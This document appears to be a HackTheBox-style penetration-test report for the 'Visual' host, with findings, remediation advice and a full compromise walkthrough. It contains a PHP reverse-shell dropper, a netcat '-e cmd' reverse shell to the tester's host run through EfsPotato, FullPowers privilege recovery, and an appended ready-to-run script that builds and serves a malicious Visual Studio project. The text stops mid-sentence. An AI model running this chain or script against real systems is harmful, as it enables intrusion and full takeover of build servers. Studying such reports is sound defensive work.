Visual - Pentest Report

Executive Summary

HackTheBox contracted Otrashoui Cybersecurity Services™ to perform a Network Penetration Test of one of Hack The Box’s internal hosts to identify security weaknesses, determine the impact to HackTheBox, and provide remediation recommendations.

Approach

Otrashoui Cybersecurity Services™ performed testing under a “black box” approach without credentials or any prior knowledge of HackTheBox’s environment.

Scope

Host Description
10.10.11.234 Visual Web Server

Assessment Overview and Recommendations

During the Penetration test against HackTheBox, Otrashoui Cybersecurity Services™ identified two (2) findings that affect HackTheBox’s information security posture.

The first finding is a Remote Code Execution vulnerability triggered when the web application builds a user-supplied Visual Studio project: build events defined in the project file are executed on the server with the privileges of the build process. This gives an attacker a foothold on the host and access to potentially sensitive data. The vulnerability can be mitigated by hardening the web application and the build pipeline, for example by disabling pre- and post-build events; because any MSBuild target can execute commands through the Exec task, untrusted projects should additionally be built only in an isolated, disposable environment.

The second finding involved insecure file permissions on the web root folder. These permissions allow any user on the system to view, modify and remove any file or folder of the web application. An attacker can use this to add malicious functionality to the web application or to cause an outage. Permissions on sensitive locations on the system should be reviewed and hardened so that only trusted and necessary users have access.

Summary of Findings

The following table presents a summary of findings by severity level:

Severity   High   Medium   Low   Total
Findings   2      0        0     2

Below is a high-level overview of each finding identified during the assessment. These findings are covered in depth in the Technical Findings Details section of this report:

Name                                               Severity
Remote Code Execution via Visual Studio Project    High
Insecure File Permissions                          High

Exploitation Walkthrough

During the course of the assessment, Otrashoui Cybersecurity Services™ was able to gain a foothold and compromise the in-scope host. The steps below demonstrate how the tester went from unauthenticated user to administrative access on the host.

Detailed Walkthrough

  1. The tester obtained remote code execution by creating a git repository containing a malicious Visual Studio project whose post-build event runs an attacker-chosen command when the web application builds the project.
  2. The tester found that the web root C:\xampp\htdocs has permissions allowing any user to add, remove or modify files.
  3. By placing a PHP file in the web root, it was possible to execute commands as the NT AUTHORITY\LOCAL SERVICE user, the account the web server runs as.
  4. This service account had most of its default privileges removed, but by creating a scheduled task running as the same account it was possible to regain them, including the dangerous SeImpersonatePrivilege.
  5. With that privilege, the tester achieved full administrative access using one of the Potato family of exploits (EfsPotato).

Reproduction Steps

In the following code snippets, [...] is used to discard irrelevant output in the current context. Additionally, lines starting with the $ character indicate a system command typed by the tester.

The reverse shell payload used throughout is a base64-encoded PowerShell one-liner executed with powershell -e; the encoded string is omitted from this report:

powershell -e <base64-encoded PowerShell reverse shell>

Initialize a git repository inside the project folder and run git update-server-info, which writes the info/refs and objects/info/packs files a plain file server needs in order for the repository to be cloned over the dumb HTTP protocol:

$ git init
Initialized empty Git repository in /tmp/Visual-RCE/.git/

$ git update-server-info

Inside the project folder, serve the .git directory using python’s built-in http.server module:

$ sudo python3 -m http.server -d .git 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
    

Some time after submitting the URL to the git repository, the reverse shell is received:

$ rlwrap nc -lnvp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.119.24:49708.

PS C:\Windows\Temp\11ac1e51470a88ca33c158f79e5699>
PS C:\xampp> icacls C:\xampp\htdocs
C:\xampp\htdocs Everyone:(OI)(CI)(F)
                Everyone:(I)(OI)(CI)(F)
                NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                BUILTIN\Administrators:(I)(OI)(CI)(F)
                BUILTIN\Users:(I)(OI)(CI)(RX)
                BUILTIN\Users:(I)(CI)(AD)
                BUILTIN\Users:(I)(CI)(WD)
                CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

It is possible to obtain a reverse shell as the NT AUTHORITY\LOCAL SERVICE user by placing a PHP file in the web root containing the same payload as above:

<?php system("powershell -e <base64-encoded PowerShell reverse shell>"); ?>

This user only has a few privileges:

PS C:\programdata> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

According to Microsoft’s documentation, the LOCAL SERVICE account holds more privileges by default, including the powerful SeImpersonatePrivilege; the privileges of this process have been stripped.

The privileges can be recovered with a technique described in the blog post by the author of FullPowers: a scheduled task created as NT AUTHORITY\LOCAL SERVICE runs with the account’s full default privilege set rather than the stripped set the current process was given. The blog author’s tool, FullPowers, automates the process:

PS C:\programdata> .\FullPowers.exe -c 'powershell -e <base64-encoded PowerShell reverse shell>'

The payload is once again the same base64 encoded PowerShell reverse shell.

After executing the command, the reverse shell is received, and the privileges are present:

$ nc -lnvp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.119.24:49740.

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

With the SeImpersonatePrivilege, it is possible to escalate to NT AUTHORITY\SYSTEM using one of the Potato exploits.

The tester used SharpEfsPotato (EFS Potato), from this GitHub repository. No compiled binary is provided, so the repository must be cloned and built on a Windows system.

After doing so, transfer the executable to the target system and run it:

C:\ProgramData>efs.exe -p "C:\ProgramData\nc.exe" -a "10.10.14.95 443 -e cmd"
efs.exe -p "C:\ProgramData\nc.exe" -a "10.10.14.95 443 -e cmd"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c0618fef-c0f3-430f-a4e5-57c10429497f/\c0618fef-c0f3-430f-a4e5-57c10429497f\c0618fef-c0f3-430f-a4e5-57c10429497f
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

The PowerShell reverse shell payload did not produce a connection when launched through EfsPotato, so the tester uploaded nc.exe and used it to establish the reverse shell instead.

Shortly after executing the command above, a reverse shell as NT AUTHORITY\SYSTEM is received:

Microsoft Windows [Version 10.0.17763.4840]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
VISUAL

Remediation Summary

Short Term

  1. Disable pre- and post-build events for projects built by the web application.
  2. Remove the Everyone full-control entry from C:\xampp\htdocs so that only administrators and the accounts that maintain the application can write to the web root.

Medium Term

  1. Build user-supplied projects only in an isolated, disposable environment with no access to the web server’s files or the internal network; any MSBuild target can run commands through the Exec task, so disabling build events alone is not sufficient.

Long Term

  1. Review and harden file permissions on all sensitive locations on the host, granting access to trusted and necessary users only.

Technical Findings Details

1. Remote Code Execution via Visual Studio Project - High

CWE 892
CVSS 3.1 Score 9.8
Affected Host 10.10.11.234
Description It is possible to execute arbitrary code on the server by submitting a git repository containing a malicious Visual Studio project; the build events defined in the project file are executed when the server builds it.
Impact The remote code execution gives attackers access to the local filesystem, as well as the internal network, giving them more opportunities to further compromise the enterprise.
Remediation Disable pre- and post-build events. Because any MSBuild target can run commands through the Exec task, untrusted projects should additionally be built only in an isolated, disposable environment.
External References https://learn.microsoft.com/en-us/visualstudio/ide/how-to-specify-build-events-csharp?view=vs-2022

Evidence

Initialize a git repository inside the project folder and run git update-server-info, which writes the info/refs and objects/info/packs files needed to clone the repository over the dumb HTTP protocol:

$ git init
Initialized empty Git repository in /tmp/Visual-RCE/.git/

$ git update-server-info

Inside the project folder, serve the .git directory using python’s built-in http.server module:

$ sudo python3 -m http.server -d .git 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Submit the URL of the malicious git repository to the web application. After some time, the post-build event is executed on the server and the request from curl.exe is received by the http.server listener:

[...]
10.129.131.221 - - [01/Oct/2023 00:52:51] "GET /ITWORKS HTTP/1.1" 404 -

The post-build event can then be changed to a reverse shell payload to obtain interactive access to the underlying server.
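The project file that both the Reproduction Steps and the evidence above depend on is not reproduced in this report. The following script is an added example, not the tester’s original project: it writes a minimal SDK-style C# project whose post-build target runs an attacker-chosen command, initialises a dumb-HTTP git repository around it and serves it with python3’s http.server, matching the steps shown above. The project name Visual-RCE (taken from the tester’s path), the attacker address 10.10.14.95 (the tester’s address in the EfsPotato step) and the net6.0 target framework are assumptions; the target framework must match what the build server has installed.

```shell
#!/bin/sh
# Added example, not part of the original report: build and serve a git
# repository holding a Visual Studio project with a malicious post-build event.
# Assumptions: project name Visual-RCE, target framework net6.0 (must match
# the build server), attacker address passed as $1, git and python3 installed.
set -eu

# Write a minimal SDK-style C# project. Visual Studio stores a post-build
# event as a target that runs after the built-in PostBuildEvent target; the
# Exec task hands the command to cmd.exe on the build server. The default
# command is the curl.exe callback used as proof of concept in this report;
# pass a third argument (e.g. "powershell -e <base64>") for a reverse shell.
# The command sits inside an XML attribute, so any &, <, >, or " in it must
# be written as &amp; &lt; &gt; &quot;.
make_project() {
  dir="$1"
  attacker="$2"
  cmd="${3:-curl.exe http://$attacker/ITWORKS}"
  mkdir -p "$dir"
  cat > "$dir/Visual-RCE.csproj" <<EOF
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
  <Target Name="PostBuild" AfterTargets="PostBuildEvent">
    <Exec Command="$cmd" />
  </Target>
</Project>
EOF
  # A trivial entry point so that the build succeeds and reaches the
  # post-build target.
  printf '%s\n' 'System.Console.WriteLine("build ok");' > "$dir/Program.cs"
}

# Turn the folder into a repository that can be cloned over the "dumb" HTTP
# protocol: git update-server-info writes info/refs and objects/info/packs,
# which a plain file server cannot generate on its own.
init_repo() {
  dir="$1"
  git -C "$dir" init -q
  git -C "$dir" add -A
  git -C "$dir" -c user.name=tester -c user.email=tester@example.invalid \
      commit -q -m "Visual-RCE"
  git -C "$dir" update-server-info
}

# Serve the .git directory at the web root (port 80 needs root). The URL
# submitted to the application is then simply http://<attacker-ip>/ and the
# ITWORKS callback shows up in this same listener's log.
serve_repo() {
  dir="$1"
  port="${2:-80}"
  sudo python3 -m http.server -d "$dir/.git" "$port"
}

# Usage: sh visual-rce.sh <attacker-ip> [command]
if [ "${1:-}" != "" ]; then
  make_project /tmp/Visual-RCE "$1" "${2:-}"
  init_repo /tmp/Visual-RCE
  serve_repo /tmp/Visual-RCE 80
fi
```

Submitting http://<attacker-ip>/ to the application triggers the GET /ITWORKS request against the same http.server listener, as in the evidence above; replacing the command with the reverse shell payload yields the foothold. If the web server accepts only smart-HTTP repositories, git’s own daemon or a git hosting service would be needed instead of a plain file server.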

2. Insecure File Permissions - High

CWE 732
CVSS 3.1 Score 8.0
Affected Host 10.10.11.234
Description File permissions on the C:\xampp\htdocs web root folder allow any user to add, modify or remove files and folders.
Impact An attacker can use these permissions to gain code execution as the service account running the web server, bring the service down, add malicious functionality targeting the users of the application, or retrieve sensitive data.
Remediation Harden the file permissions of the web root and other sensitive locations: remove the Everyone full-control entry, stop inheriting the permissive entries from the parent folder, and grant write access only to the accounts that administer the application; the web server’s service account needs read access only. Re-verify with icacls after the change.
External References https://ss64.com/nt/icacls.html

Evidence

Inspect file permissions using the icacls Windows utility:

PS C:\xampp> icacls C:\xampp\htdocs
C:\xampp\htdocs Everyone:(OI)(CI)(F)
                Everyone:(I)(OI)(CI)(F)
                NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                BUILTIN\Administrators:(I)(OI)(CI)(F)
                BUILTIN\Users:(I)(OI)(CI)(RX)
                BUILTIN\Users:(I)(CI)(AD)
                BUILTIN\Users:(I)(CI)(WD)
                CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

Everyone has Full Control (F) on C:\xampp\htdocs, both as an explicit entry and as one inherited from the parent folder, and both entries propagate to subfolders and files ((OI)(CI)).

Create a simple PHP script to execute system commands:

<?php system("whoami /all"); ?>

Note that the PHP script must be saved as plain ASCII/UTF-8 without a byte order mark. A file written as UTF-16LE, which is what a Windows PowerShell 5 session produces by default when redirecting output to a file, is not parsed by PHP and will not execute under Apache; creating the file on a Linux or macOS system avoids the problem.

After transferring the file to the target system and placing it in the web root (C:\xampp\htdocs), it is possible to execute commands as the NT AUTHORITY\LOCAL SERVICE user: